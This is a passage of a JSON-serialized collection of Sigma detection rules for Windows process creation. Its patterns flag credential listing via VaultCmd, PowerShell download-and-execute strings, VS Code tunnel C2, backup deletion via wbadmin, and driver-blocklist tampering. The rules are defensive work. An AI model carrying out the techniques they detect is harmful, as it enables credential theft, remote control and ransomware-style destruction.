https://support.citrix.com/article/CTX983798/purpose-of-cmstart-command\n            - ':\\Program Files (x86)\\Citrix\\System32\\icast.exe'\n            - ':\\Program Files\\Citrix\\HDX\\bin\\cmstart.exe' # https://support.citrix.com/article/CTX983798/purpose-of-cmstart-command\n            - ':\\Program Files\\Citrix\\HDX\\bin\\icast.exe' # https://support.citrix.com/article/CTX983798/purpose-of-cmstart-command\n            - ':\\Program Files\\Citrix\\System32\\icast.exe'\n    filter_optional_image_null:\n        Image: null\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate logon scripts or custom shells may trigger false positives. Apply additional filters accordingly.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_vaultcmd_list_creds.yml",
    "content": "title: Windows Credential Manager Access via VaultCmd\nid: 58f50261-c53b-4c88-bd12-1d71f12eda4c\nstatus: test\ndescription: List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.004/T1555.004.md#atomic-test-1---access-saved-credentials-via-vaultcmd\nauthor: frack113\ndate: 2022-04-08\nmodified: 2022-05-13\ntags:\n    - attack.credential-access\n    - attack.t1555.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\VaultCmd.exe'\n        - OriginalFileName: 'VAULTCMD.EXE'\n    selection_cli:\n        CommandLine|contains: '/listcreds:'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_vbscript_registry_modification.yml",
    "content": "title: Registry Modification Attempt Via VBScript\nid: 921aa10f-2e74-4cca-9498-98f9ca4d6fdf\nrelated:\n    - id: 2a0a169d-cc66-43ce-9ae2-6e678e54e46a\n      type: similar\n    - id: 7f4c43f9-b1a5-4c7d-b24a-b41bf3a3ebf2\n      type: similar\nstatus: experimental\ndescription: |\n    Detects attempts to modify the registry using VBScript's CreateObject(\"Wscript.shell\") and RegWrite methods via common LOLBINs.\n    It could be an attempt to modify the registry for persistence without using straightforward methods like regedit.exe, reg.exe, or PowerShell.\n    Threat Actors may use this technique to evade detection by security solutions that monitor for direct registry modifications through traditional tools.\nreferences:\n    - https://www.linkedin.com/posts/mauricefielenbach_livingofftheland-redteam-persistence-activity-7344801774182051843-TE00/\n    - https://www.nextron-systems.com/2025/07/29/detecting-the-most-popular-mitre-persistence-method-registry-run-keys-startup-folder/\ndate: 2025-08-13\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.execution\n    - attack.t1112\n    - attack.t1059.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'CreateObject'\n            - 'Wscript.shell'\n            - '.RegWrite'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml",
    "content": "title: Verclsid.exe Runs COM Object\nid: d06be4b9-8045-428b-a567-740a26d9db25\nstatus: test\ndescription: Detects when verclsid.exe is used to run COM object via GUID\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Verclsid/\n    - https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5\n    - https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/\nauthor: Victor Sergeev, oscd.community\ndate: 2020-10-09\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\verclsid.exe'\n        - OriginalFileName: 'verclsid.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - '/S'\n            - '/C'\n    filter_main_runtimebroker:\n        ParentImage|endswith: 'C:\\Windows\\System32\\RuntimeBroker.exe'\n        CommandLine|contains|all:\n            - 'verclsid.exe\" /S /C {'\n            - '} /I {'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_virtualbox_execution.yml",
    "content": "title: Virtualbox Driver Installation or Starting of VMs\nid: bab049ca-7471-4828-9024-38279a4c04da\nstatus: test\ndescription: Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.\nreferences:\n    - https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/\n    - https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/\nauthor: Janantha Marasinghe\ndate: 2020-09-26\nmodified: 2025-07-29\ntags:\n    - attack.defense-evasion\n    - attack.t1564.006\n    - attack.t1564\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        CommandLine|contains:\n            - 'VBoxRT.dll,RTR3Init'\n            - 'VBoxC.dll'\n            - 'VBoxDrv.sys'\n    selection_2:\n        CommandLine|contains:\n            - 'startvm'\n            - 'controlvm'\n    condition: 1 of selection_*\nfalsepositives:\n    - This may have false positives on hosts where Virtualbox is legitimately being used for operations\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml",
    "content": "title: Suspicious VBoxDrvInst.exe Parameters\nid: b7b19cb6-9b32-4fc4-a108-73f19acfe262\nstatus: test\ndescription: |\n  Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\n  This allows to create values in the registry and install drivers.\n  For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml\n    - https://twitter.com/pabraeken/status/993497996179492864\nauthor: Konstantin Grishchenko, oscd.community\ndate: 2020-10-06\nmodified: 2021-11-27\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\VBoxDrvInst.exe'\n        CommandLine|contains|all:\n            - 'driver'\n            - 'executeinf'\n    condition: selection\nfalsepositives:\n    - Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml",
    "content": "title: Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script\nid: 7aa4e81a-a65c-4e10-9f81-b200eb229d7d\nrelated:\n    - id: 236d8e89-ed95-4789-a982-36f4643738ba\n      type: derived\nstatus: test\ndescription: Detects execution of the \"VMwareToolBoxCmd.exe\" with the \"script\" and \"set\" flag to setup a specific script to run for a specific VM state\nreferences:\n    - https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/\n    - https://www.hexacorn.com/blog/2017/01/14/beyond-good-ol-run-key-part-53/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-14\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\VMwareToolBoxCmd.exe'\n        - OriginalFileName: 'toolbox-cmd.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' script '\n            - ' set '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml",
    "content": "title: Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script\nid: 236d8e89-ed95-4789-a982-36f4643738ba\nrelated:\n    - id: 7aa4e81a-a65c-4e10-9f81-b200eb229d7d\n      type: derived\nstatus: test\ndescription: Detects execution of the \"VMwareToolBoxCmd.exe\" with the \"script\" and \"set\" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state\nreferences:\n    - https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-14\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_bin_img:\n        - Image|endswith: '\\VMwareToolBoxCmd.exe'\n        - OriginalFileName: 'toolbox-cmd.exe'\n    selection_bin_cli:\n        CommandLine|contains|all:\n            - ' script '\n            - ' set '\n    selection_susp_paths:\n        CommandLine|contains:\n            - ':\\PerfLogs\\'\n            - ':\\Temp\\'\n            - ':\\Windows\\System32\\Tasks\\'\n            - ':\\Windows\\Tasks\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml",
    "content": "title: VMToolsd Suspicious Child Process\nid: 5687f942-867b-4578-ade7-1e341c46e99a\nstatus: test\ndescription: Detects suspicious child process creations of VMware Tools process which may indicate persistence setup\nreferences:\n    - https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/\n    - https://user-images.githubusercontent.com/61026070/136518004-b68cce7d-f9b8-4e9a-9b7b-53b1568a9a94.png\n    - https://github.com/vmware/open-vm-tools/blob/master/open-vm-tools/tools.conf\nauthor: bohops, Bhabesh Raj\ndate: 2021-10-08\nmodified: 2023-07-25\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\vmtoolsd.exe'\n    selection_img:\n        - Image|endswith:\n              - '\\cmd.exe'\n              - '\\cscript.exe'\n              - '\\mshta.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\wscript.exe'\n        - OriginalFileName:\n              - 'Cmd.Exe'\n              - 'cscript.exe'\n              - 'MSHTA.EXE'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n              - 'REGSVR32.EXE'\n              - 'RUNDLL32.EXE'\n              - 'wscript.exe'\n    filter_main_vmwaretools_script:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains:\n            - '\\VMware\\VMware Tools\\poweron-vm-default.bat'\n            - '\\VMware\\VMware Tools\\poweroff-vm-default.bat'\n            - '\\VMware\\VMware Tools\\resume-vm-default.bat'\n            - '\\VMware\\VMware Tools\\suspend-vm-default.bat'\n    filter_main_empty:\n        Image|endswith: '\\cmd.exe'\n        CommandLine: ''\n    filter_main_null:\n        Image|endswith: '\\cmd.exe'\n        CommandLine: null\n    condition: all of selection* and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate use by VM administrator\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml",
    "content": "title: Potentially Suspicious Child Process Of VsCode\nid: 5a3164f2-b373-4152-93cf-090b13c12d27\nstatus: test\ndescription: Detects uncommon or suspicious child processes spawning from a VsCode \"code.exe\" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.\nreferences:\n    - https://twitter.com/nas_bench/status/1618021838407495681\n    - https://twitter.com/nas_bench/status/1618021415852335105\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-26\nmodified: 2023-10-25\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\code.exe'\n    selection_children_images:\n        Image|endswith:\n            - '\\calc.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\cscript.exe'\n            - '\\wscript.exe'\n    selection_children_cli:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\cmd.exe'\n        CommandLine|contains:\n            - 'Invoke-Expressions'\n            - 'IEX'\n            - 'Invoke-Command'\n            - 'ICM'\n            - 'DownloadString'\n            - 'rundll32'\n            - 'regsvr32'\n            - 'wscript'\n            - 'cscript'\n    selection_children_paths:\n        Image|contains:\n            # Add more suspicious locations\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - ':\\Temp\\'\n    condition: selection_parent and 1 of selection_children_*\nfalsepositives:\n    - In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_vscode_tunnel_execution.yml",
    "content": "title: Visual Studio Code Tunnel Execution\nid: 90d6bd71-dffb-4989-8d86-a827fedd6624\nstatus: test\ndescription: Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel\nreferences:\n    - https://ipfyx.fr/post/visual-studio-code-tunnel/\n    - https://badoption.eu/blog/2023/01/31/code_c2.html\n    - https://code.visualstudio.com/docs/remote/tunnels\nauthor: Nasreddine Bencherchali (Nextron Systems), citron_ninja\ndate: 2023-10-25\nmodified: 2025-10-29\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\n    - attack.t1219\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_only_tunnel:\n        OriginalFileName: null\n        CommandLine|endswith: '.exe tunnel'\n    selection_tunnel_args:\n        CommandLine|contains|all:\n            - '.exe tunnel'\n            - '--accept-server-license-terms'\n    selection_parent_tunnel:\n        ParentCommandLine|endswith: ' tunnel'\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains|all:\n            - '/d /c '\n            - '\\servers\\Stable-'\n            - 'code-server.cmd'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate use of Visual Studio Code tunnel\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_vscode_tunnel_remote_shell_.yml",
    "content": "title: Visual Studio Code Tunnel Shell Execution\nid: f4a623c2-4ef5-4c33-b811-0642f702c9f1\nstatus: test\ndescription: Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system.\nreferences:\n    - https://ipfyx.fr/post/visual-studio-code-tunnel/\n    - https://badoption.eu/blog/2023/01/31/code_c2.html\n    - https://code.visualstudio.com/docs/remote/tunnels\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-25\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|contains: '\\servers\\Stable-'\n        ParentImage|endswith: '\\server\\node.exe'\n        ParentCommandLine|contains: '.vscode-server' # Technically one can host its own local server instead of using the VsCode one. And that would probably change the name (requires further research)\n    # Note: Child processes (ie: shells) can be whatever technically (with some efforts)\n    selection_child_1:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains: '\\terminal\\browser\\media\\shellIntegration.ps1'\n    selection_child_2:\n        Image|endswith:\n            - '\\wsl.exe'\n            - '\\bash.exe'\n    condition: selection_parent and 1 of selection_child_*\nfalsepositives:\n    - Legitimate use of Visual Studio Code tunnel and running code from there\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_vscode_tunnel_renamed_execution.yml",
    "content": "title: Renamed Visual Studio Code Tunnel Execution\nid: 2cf29f11-e356-4f61-98c0-1bdb9393d6da\nstatus: test\ndescription: Detects renamed Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel\nreferences:\n    - https://ipfyx.fr/post/visual-studio-code-tunnel/\n    - https://badoption.eu/blog/2023/01/31/code_c2.html\n    - https://code.visualstudio.com/docs/remote/tunnels\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-28\nmodified: 2025-10-29\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\n    - attack.t1219\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_image_only_tunnel:\n        OriginalFileName: null\n        CommandLine|endswith: '.exe tunnel'\n    selection_image_tunnel_args:\n        CommandLine|contains|all:\n            - '.exe tunnel'\n            - '--accept-server-license-terms'\n    selection_image_tunnel_service:\n        CommandLine|contains|all:\n            - 'tunnel '\n            - 'service'\n            - 'internal-run'\n            - 'tunnel-service.log'\n    selection_parent_tunnel:\n        ParentCommandLine|endswith: ' tunnel'\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains|all:\n            - '/d /c '\n            - '\\servers\\Stable-'\n            - 'code-server.cmd'\n    filter_main_parent_code:\n        ParentImage|endswith:\n            - '\\code-tunnel.exe'\n            - '\\code.exe'\n    filter_main_image_code:\n        Image|endswith:\n            - '\\code-tunnel.exe'\n            - '\\code.exe'\n    condition: (1 of selection_image_* and not 1 of filter_main_image_*) or (selection_parent_tunnel and not 1 of filter_main_parent_*)\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_vscode_tunnel_service_install.yml",
    "content": "title: Visual Studio Code Tunnel Service Installation\nid: 30bf1789-379d-4fdc-900f-55cd0a90a801\nstatus: test\ndescription: Detects the installation of VsCode tunnel (code-tunnel) as a service.\nreferences:\n    - https://ipfyx.fr/post/visual-studio-code-tunnel/\n    - https://badoption.eu/blog/2023/01/31/code_c2.html\n    - https://code.visualstudio.com/docs/remote/tunnels\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-25\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'tunnel '\n            - 'service'\n            - 'internal-run'\n            - 'tunnel-service.log'\n    condition: selection\nfalsepositives:\n    - Legitimate installation of code-tunnel as a service\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_vsdiagnostics_execution_proxy.yml",
    "content": "title: Potential Binary Proxy Execution Via VSDiagnostics.EXE\nid: ac1c92b4-ac81-405a-9978-4604d78cc47e\nstatus: test\ndescription: Detects execution of \"VSDiagnostics.exe\" with the \"start\" command in order to launch and proxy arbitrary binaries.\nreferences:\n    - https://twitter.com/0xBoku/status/1679200664013135872\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-03\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\VSDiagnostics.exe'\n        - OriginalFileName: 'VSDiagnostics.exe'\n    selection_cli_start:\n        CommandLine|contains: 'start'\n    selection_cli_launch:\n        CommandLine|contains:\n            - ' /launch:'\n            - ' -launch:'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage for tracing and diagnostics purposes\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_vshadow_exec.yml",
    "content": "title: Proxy Execution via Vshadow\nid: d7c75059-2901-4578-b209-8837fd31c6a8\nstatus: experimental\ndescription: |\n    Detects the invocation of vshadow.exe with the -exec parameter that executes a specified script or command after the shadow copies are created but before the VShadow tool exits.\n    VShadow is a command-line tool that you can use to create and manage volume shadow copies. While legitimate backup or administrative scripts may use this flag,\n    attackers can leverage this parameter to proxy the execution of malware.\nauthor: David Faiss\ndate: 2025-05-26\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vshadow/\n    - https://learn.microsoft.com/en-us/windows/win32/vss/vshadow-tool-and-sample\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\vshadow.exe'\n        - OriginalFileName: 'vshadow.exe'\n    selection_cli:\n        CommandLine|contains: '-exec'\n    condition: all of selection_*\nfalsepositives:\n    - System backup or administrator tools\n    - Legitimate administrative scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml",
    "content": "title: Suspicious Vsls-Agent Command With AgentExtensionPath Load\nid: 43103702-5886-11ed-9b6a-0242ac120002\nstatus: test\ndescription: Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter\nreferences:\n    - https://twitter.com/bohops/status/1583916360404729857\nauthor: bohops\ndate: 2022-10-30\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\vsls-agent.exe'\n        CommandLine|contains: '--agentExtensionPath'\n    filter:\n        CommandLine|contains: 'Microsoft.VisualStudio.LiveShare.Agent.'\n    condition: selection and not filter\nfalsepositives:\n    - False positives depend on custom use of vsls-agent.exe\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_vulnerable_driver_blocklist_registry_tampering.yml",
    "content": "title: Vulnerable Driver Blocklist Registry Tampering Via CommandLine\nid: 22154f0e-5132-4a54-aa78-cc62f6def531\nrelated:\n    - id: d526c60a-e236-4011-b165-831ffa52ab70\n      type: similar\nstatus: experimental\ndescription: |\n    Detects tampering of the Vulnerable Driver Blocklist registry via command line tools such as PowerShell or REG.EXE.\n    The Vulnerable Driver Blocklist is a security feature that helps prevent the loading of known vulnerable drivers.\n    Disabling this feature may indicate an attempt to bypass security controls, often targeted by threat actors\n    to facilitate the installation of malicious or vulnerable drivers, particularly in scenarios involving Endpoint Detection and Response\nreferences:\n    - https://www.sophos.com/en-us/blog/sharpening-the-knife-gold-blades-strategic-evolution\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/microsoft-recommended-driver-block-rules\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2026-01-26\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\reg.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n              - 'reg.exe'\n    selection_cli_1:\n        CommandLine|contains:\n            - 'add '\n            - 'New-ItemProperty '\n            - 'Set-ItemProperty '\n            - 'si '  # SetItem Alias\n    selection_cli_2:\n        CommandLine|contains|all:\n            - '\\Control\\CI\\Config'\n            - 'VulnerableDriverBlocklistEnable'\n    condition: all of selection_*\nfalsepositives:\n    - It is very unlikely for legitimate activities to disable the Vulnerable Driver Blocklist via command line tools; thus it is recommended to investigate promptly.\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_vulnerable_driver_blocklist_registry_tampering/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_w32tm.yml",
    "content": "title: Use of W32tm as Timer\nid: 6da2c9f5-7c53-401b-aacb-92c040ce1215\nstatus: test\ndescription: When configured with suitable command line arguments, w32tm can act as a delay mechanism\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md\n    - https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains\nauthor: frack113\ndate: 2022-09-25\ntags:\n    - attack.discovery\n    - attack.t1124\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_w32tm:\n        - Image|endswith: '\\w32tm.exe'\n        - OriginalFileName: 'w32time.dll'\n    selection_cmd:\n        CommandLine|contains|all:\n            - '/stripchart'\n            - '/computer:'\n            - '/period:'\n            - '/dataonly'\n            - '/samples:'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml",
    "content": "title: Wab Execution From Non Default Location\nid: 395907ee-96e5-4666-af2e-2ca91688e151\nstatus: test\ndescription: Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity\nreferences:\n    - https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime\n    - https://thedfirreport.com/2022/09/26/bumblebee-round-two/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-12\nmodified: 2022-09-27\ntags:\n    - attack.defense-evasion\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\wab.exe'\n            - '\\wabmig.exe'\n    filter:\n        Image|startswith:\n            - 'C:\\Windows\\WinSxS\\'\n            - 'C:\\Program Files\\Windows Mail\\'\n            - 'C:\\Program Files (x86)\\Windows Mail\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml",
    "content": "title: Wab/Wabmig Unusual Parent Or Child Processes\nid: 63d1ccc0-2a43-4f4b-9289-361b308991ff\nstatus: test\ndescription: Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity\nreferences:\n    - https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime\n    - https://thedfirreport.com/2022/09/26/bumblebee-round-two/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-12\nmodified: 2022-09-27\ntags:\n    - attack.defense-evasion\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith:\n            # Add more if known\n            - \\WmiPrvSE.exe\n            - \\svchost.exe\n            - \\dllhost.exe\n        Image|endswith:\n            - '\\wab.exe'\n            - '\\wabmig.exe' # (Microsoft Address Book Import Tool)\n    selection_child:\n        # You can add specific suspicious child processes (such as cmd, powershell...) to increase the accuracy\n        ParentImage|endswith:\n            - '\\wab.exe'\n            - '\\wabmig.exe' # (Microsoft Address Book Import Tool)\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wbadmin_delete_all_backups.yml",
    "content": "title: All Backups Deleted Via Wbadmin.EXE\nid: 639c9081-f482-47d3-a0bd-ddee3d4ecd76\nrelated:\n    - id: 89f75308-5b1b-4390-b2d8-d6b2340efaf8\n      type: derived\nstatus: test\ndescription: |\n    Detects the deletion of all backups or system state backups via \"wbadmin.exe\".\n    This technique is used by numerous ransomware families and actors.\n    This may only be successful on server platforms that have Windows Backup enabled.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell\n    - https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md\n    - https://www.sentinelone.com/labs/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/\n    - https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted\n    - https://www.trendmicro.com/content/dam/trendmicro/global/en/research/24/b/lockbit-attempts-to-stay-afloat-with-a-new-version/technical-appendix-lockbit-ng-dev-analysis.pdf\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-systemstatebackup\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-12-13\nmodified: 2024-05-10\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wbadmin.exe'\n        - OriginalFileName: 'WBADMIN.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'delete'\n            - 'backup' # Also covers \"SYSTEMSTATEBACKUP\"\n        CommandLine|contains: 'keepVersions:0'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wbadmin_delete_backups.yml",
    "content": "title: Windows Backup Deleted Via Wbadmin.EXE\nid: 89f75308-5b1b-4390-b2d8-d6b2340efaf8\nrelated:\n    - id: 639c9081-f482-47d3-a0bd-ddee3d4ecd76\n      type: derived\nstatus: test\ndescription: |\n    Detects the deletion of backups or system state backups via \"wbadmin.exe\".\n    This technique is used by numerous ransomware families and actors.\n    This may only be successful on server platforms that have Windows Backup enabled.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell\n    - https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md\n    - https://www.sentinelone.com/labs/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/\n    - https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted\n    - https://www.trendmicro.com/content/dam/trendmicro/global/en/research/24/b/lockbit-attempts-to-stay-afloat-with-a-new-version/technical-appendix-lockbit-ng-dev-analysis.pdf\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-systemstatebackup\nauthor: 